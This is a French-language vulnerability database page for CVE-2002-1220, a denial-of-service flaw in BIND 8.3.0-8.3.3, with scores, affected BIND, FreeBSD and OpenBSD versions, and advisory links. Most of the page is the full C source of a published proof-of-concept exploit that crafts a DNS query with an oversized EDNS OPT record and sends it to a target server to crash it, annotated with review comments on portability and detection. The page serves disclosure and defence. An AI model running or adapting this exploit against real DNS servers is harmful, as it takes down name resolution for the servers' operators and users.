CVE-2002-1220 : Détail

CVE-2002-1220

32.63%V3
Network
2004-09-01
02h00 +00:00
2004-08-03
22h00 +00:00

Descriptions du CVE

BIND 8.3.x through 8.3.3 allows remote attackers to cause a denial of service (termination due to assertion failure) via a request for a subdomain that does not exist, with an OPT resource record with a large UDP payload size.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 22011

Date de publication : 2002-11-11 23h00 +00:00
Auteur : spybreak
EDB Vérifié : Yes

// source: https://www.securityfocus.com/bid/6161/info
// ISC BIND is vulnerable to a denial of service attack. When a DNS lookup is
// requested on a non-existent sub-domain of a valid domain and an OPT resource
// record with a large UDP payload is attached, the server may fail.

/*
 *
 * bind_optdos.c
 *
 * OPT DoS Remote Exploit for BIND 8.3.0 - 8.3.3-REL
 * Based on the bug disclosed by ISS
 *
 * (c) Spybreak (spybreak@host.sk) November/2002
 *
 * Proof of concept exploit code
 * For educational and testing purposes only!
 *
 *
 * Usage: ./bind_optdos domain target [udp_size]
 *
 * domain - should be a nonexistent subdomain
 * of an existing one, different from the target's,
 * or a domain whose authoritative name servers are
 * unreachable
 *
 *
 * Greetz to: sd, g00bER and hysteria.sk ;-)
 *
 */

/*
 * Review notes (CVE-2002-1220, historical proof of concept):
 *
 * What the code below actually does: it builds ONE DNS query datagram
 * (QDCOUNT=1, ARCOUNT=1, RD set) for the name given on the command line,
 * appends an EDNS OPT pseudo-record (TYPE 41) whose CLASS field advertises
 * a UDP payload size (65535 unless overridden), sends it once to UDP/53 on
 * the target, and waits up to TIMEOUT seconds for any reply.  The datagram
 * appears to be a well-formed EDNS0 query; per the CVE text the affected
 * BIND releases (8.3.0 - 8.3.3) terminate on an assertion failure when the
 * queried name does not exist and such an OPT record is attached.
 *
 * For defenders: the affected releases are long obsolete and the fix is a
 * supported BIND version (see the vendor advisories referenced on this
 * page).  On the wire the query differs from legitimate EDNS traffic only
 * in the nonexistent name, so the datagram itself has little signature
 * value; the observable symptom is named exiting on an assertion failure.
 *
 * The code is 2002-era C and is NOT portable as written: it uses a cast
 * expression as an lvalue ("*(((unsigned short *) bu)++)"), depends on the
 * compiler's bit-field allocation order to form the DNS flags word, uses
 * legacy bcopy()/bzero(), and declares main() with implicit int.  The
 * line-level notes below point these out; the code is left as published.
 */

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <time.h>

#define UDP_SIZE 65535   /* default EDNS UDP payload size advertised in the OPT RR */
#define OPT 41           /* RR TYPE value of the EDNS OPT pseudo-record */
#define PORT 53          /* destination UDP port (DNS) */
#define MAXRESP 1024     /* bytes of a reply that recvfrom() may store */
#define TIMEOUT 10       /* seconds to wait for a reply before giving up */

/*
 * Host-side view of the 16-bit DNS header flags word (RFC 1035 4.1.1).
 * NOTE(review): the fields are listed low-order first, which reproduces the
 * RFC bit positions only when the compiler allocates bit-fields from the
 * least significant bit (GCC on little-endian targets); main() reads the
 * struct back through an unsigned short pointer and byte-swaps it with
 * htons().  On other ABIs the flags word would come out scrambled.
 */
typedef struct {
    unsigned short rcode : 4;   /* response code (0 = no error) */
    unsigned short zero : 3;    /* reserved Z bits */
    unsigned short ra : 1;      /* recursion available */
    unsigned short rd : 1;      /* recursion desired */
    unsigned short tc : 1;      /* truncated */
    unsigned short aa : 1;      /* authoritative answer */
    unsigned short opcode : 4;  /* 0 = standard query */
    unsigned short qr : 1;      /* 0 = query, 1 = response */
} MSG_FLAGS;

/* Fixed 12-byte DNS message header; main() stores every field in network byte order. */
typedef struct {
    unsigned short id;      /* transaction ID */
    unsigned short flags;   /* MSG_FLAGS packed into one word */
    unsigned short nqst;    /* QDCOUNT */
    unsigned short nansw;   /* ANCOUNT */
    unsigned short nauth;   /* NSCOUNT */
    unsigned short nadd;    /* ARCOUNT */
} DNS_MSG_HDR;

/* Print the banner and the command-line synopsis, then exit with status 0. */
void usage(char *argv0)
{
    printf("********************************************\n"
           "* OPT DoS Exploit for BIND 8.3.[0-3] *\n"
           "* (c) Spybreak November/2002 *\n"
           "********************************************\n");
    printf("\n%s domain target [udp_size]\n\n", argv0);
    exit(0);
}

/*
 * SIGALRM handler: reached when no datagram arrived within TIMEOUT seconds.
 * NOTE(review): printf() and exit() are not async-signal-safe; tolerable only
 * because the process terminates here.  A missing reply is weak evidence of
 * a crash — packet loss, filtering or a server that does not answer look
 * exactly the same from this side.
 */
void sig_alrm(int signo)
{
    printf("No response yet, the target BIND seems to be down\n");
    exit(0);
}

/*
 * Entry point: bind_optdos domain target [udp_size]
 *
 *   argv[1]  query name; a trailing dot is stripped, then it is converted
 *            to DNS wire format in qname
 *   argv[2]  target host name or IPv4 address, resolved with gethostbyname()
 *   argv[3]  optional EDNS UDP payload size, default UDP_SIZE
 *
 * Exits 0 after a reply or a timeout, -1 on resolver/socket/sendto failure.
 * NOTE(review): pre-C99 implicit-int declaration; nothing is returned
 * because every path ends in exit().
 */
main(int argc, char **argv)
{
    struct sockaddr_in targ_addr;
    struct hostent *he;
    MSG_FLAGS fl;
    DNS_MSG_HDR hdr;
    unsigned char qname[512], buff[1024];   /* wire-format QNAME; outgoing datagram */
    unsigned char *bu, *dom, *dot;          /* bu: write cursor into buff; dom/dot: label walk */
    int msg_size, dom_len, sockfd, n;
    unsigned short udp_size = UDP_SIZE;
    char response[MAXRESP + 1];

    if (argc < 3)
        usage(argv[0]);
    /* atoi() reports no errors: a non-numeric argument silently becomes 0,
       and values above 65535 are truncated by the cast. */
    if (argc == 4)
        udp_size = (unsigned short) atoi(argv[3]);
    /* gethostbyname() is IPv4-only and obsolete; only the first address is used. */
    if (!(he = gethostbyname(argv[2]))) {
        printf("Invalid target '%s'\n", argv[2]);
        exit(-1);
    }
    printf("Query on domain: %s\nTarget: %s\n", argv[1], argv[2]);
    printf("EDNS UDP size: %u\n", udp_size);

    /* Strip a trailing dot so the label walk below does not emit an empty
       last label.  NOTE(review): an empty argv[1] indexes argv[1][-1]. */
    if (argv[1][strlen(argv[1]) - 1] == '.')
        argv[1][strlen(argv[1]) - 1] = '\0';

    /*
     * Convert "a.b.c" to wire format: qname[0] is reserved for the first
     * label length, and each '.' is overwritten in place with the length of
     * the label that follows it.  The NUL left by strncpy() doubles as the
     * root-label terminator.
     * NOTE(review): only qname[1..510] is ever written, so a name of 510 or
     * more characters leaves qname unterminated and the strlen() calls below
     * read past the array.
     */
    strncpy(qname + 1, argv[1], sizeof(qname) - 2);
    dom = qname;
    while (dot = (unsigned char *) strchr(dom + 1, '.')) {
        *dom = dot - dom - 1;   /* length of the label between this length byte and the next dot */
        dom = dot;
    }
    *dom = strlen(dom + 1);     /* length of the final label */
    /* wire length of the name: offset of the last length byte + last label
       + that length byte + root terminator */
    dom_len = dom - qname + strlen(dom + 1) + 2;

    bu = buff;
    /* Standard recursive query: only RD is set. */
    fl.qr = 0; fl.opcode = 0; fl.aa = 0; fl.tc = 0;
    fl.rd = 1; fl.ra = 0; fl.zero = 0; fl.rcode = 0;
    /* Transaction ID in 1..65535; time(0) seeding makes it predictable,
       which is irrelevant for a single outgoing query. */
    srand(time(0));
    hdr.id = htons((unsigned short) (65535.0*rand()/(RAND_MAX+1.0)) + 1);
    /* NOTE(review): type-puns the bit-field struct through an unsigned short
       pointer — see the MSG_FLAGS comment for the layout assumption. */
    hdr.flags = htons(*((unsigned short *) &fl));
    hdr.nqst = htons(1);     /* one question */
    hdr.nansw = 0;
    hdr.nauth = 0;
    hdr.nadd = htons(1);     /* one additional record: the OPT RR */

    /* Header, then QNAME.  bcopy()/bzero() are legacy BSD interfaces. */
    bcopy(&hdr, bu, sizeof(hdr));
    bu += sizeof(hdr);
    bcopy(qname, bu, dom_len);
    bu += dom_len;

    /*
     * NOTE(review): "*(((T *) bu)++) = v" uses a cast expression as an
     * lvalue, which is not standard C (an old GCC extension); the stores
     * are also unaligned.  Left as published.
     */
    *(((unsigned short *) bu)++) = htons(1); //query type  (1 = A)
    *(((unsigned short *) bu)++) = htons(1); //query class (1 = IN)

    //opt rr  (EDNS0 pseudo-record, RFC 2671 layout: NAME TYPE CLASS TTL RDLEN)
    *bu++ = '\0';                                   //owner name: root
    *(((unsigned short *) bu)++) = htons(OPT);      //type
    *(((unsigned short *) bu)++) = htons(udp_size); //udp payload size (carried in the CLASS field)
    /* NOTE(review): a 16-bit htons() result is stored into the 4-byte TTL
       slot; correct only because the value is 0. */
    *(((unsigned int *) bu)++) = htons(0);          //extended rcode and flags
    *(((unsigned short *) bu)++) = htons(0);        //rdlen (no options)
    msg_size = bu - buff;   /* 12 + dom_len + 4 + 11 bytes */

    bzero(&targ_addr, sizeof(targ_addr));
    targ_addr.sin_family = AF_INET;
    targ_addr.sin_port = htons(PORT);
    targ_addr.sin_addr = *(struct in_addr *) he->h_addr;   /* first resolved address */

    sockfd = socket(AF_INET, SOCK_DGRAM, 0);
    if (sockfd < 0) {
        perror("socket");
        exit(-1);
    }
    /* A single datagram; there is no retry. */
    n = sendto(sockfd, buff, msg_size, 0, (struct sockaddr *) &targ_addr, (socklen_t) sizeof(targ_addr));
    if (n < 0) {
        perror("sendto");
        exit(-1);
    }
    printf("Datagram sent\nWaiting for response ...\n");

    /* Block in recvfrom() for at most TIMEOUT seconds; sig_alrm() exits with
       the "seems to be down" message.  NOTE(review): the reply is neither
       length-checked (n is ignored) nor parsed — any datagram delivered to
       this unconnected socket counts as "still up". */
    signal(SIGALRM, sig_alrm);
    alarm(TIMEOUT);
    n = recvfrom(sockfd, response, MAXRESP, 0, NULL, NULL);
    alarm(0);
    printf("Response received, the target BIND seems to be still up\n");
    printf("Maybe the target is not an OPT DoS vulnerable BIND version,recursion disabled, or try to change domain/udp_size, ...\n");
    exit(0);
}

Products Mentioned

Configuration 0

Isc>>Bind >> Version 8.3.0

Isc>>Bind >> Version 8.3.1

Isc>>Bind >> Version 8.3.2

Isc>>Bind >> Version 8.3.3

Configuration 0

Freebsd>>Freebsd >> Version 4.4

Freebsd>>Freebsd >> Version 4.5

Freebsd>>Freebsd >> Version 4.6

Freebsd>>Freebsd >> Version 4.7

Openbsd>>Openbsd >> Version 3.0

Openbsd>>Openbsd >> Version 3.1

Openbsd>>Openbsd >> Version 3.2

Références

http://www.cert.org/advisories/CA-2002-31.html
Tags : third-party-advisory, x_refsource_CERT
http://www.debian.org/security/2002/dsa-196
Tags : vendor-advisory, x_refsource_DEBIAN
http://online.securityfocus.com/advisories/4999
Tags : vendor-advisory, x_refsource_COMPAQ
http://marc.info/?l=bugtraq&m=103763574715133&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.kb.cert.org/vuls/id/229595
Tags : third-party-advisory, x_refsource_CERT-VN
http://www.securityfocus.com/bid/6161
Tags : vdb-entry, x_refsource_BID
http://online.securityfocus.com/archive/1/300019
Tags : mailing-list, x_refsource_BUGTRAQ
http://marc.info/?l=bugtraq&m=103713117612842&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.ciac.org/ciac/bulletins/n-013.shtml
Tags : third-party-advisory, government-resource, x_refsource_CIAC
http://www.linux-mandrake.com/en/security/2002/MDKSA-2002-077.php
Tags : vendor-advisory, x_refsource_MANDRAKE